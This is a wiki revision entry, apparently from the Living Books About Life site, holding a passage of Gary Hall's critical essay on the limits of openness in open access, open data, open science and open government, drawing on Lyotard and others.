		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5504</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5504"/>
		<updated>2013-11-03T15:06:41Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a&amp;amp;nbsp; point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into 'scientism'). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. (Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; 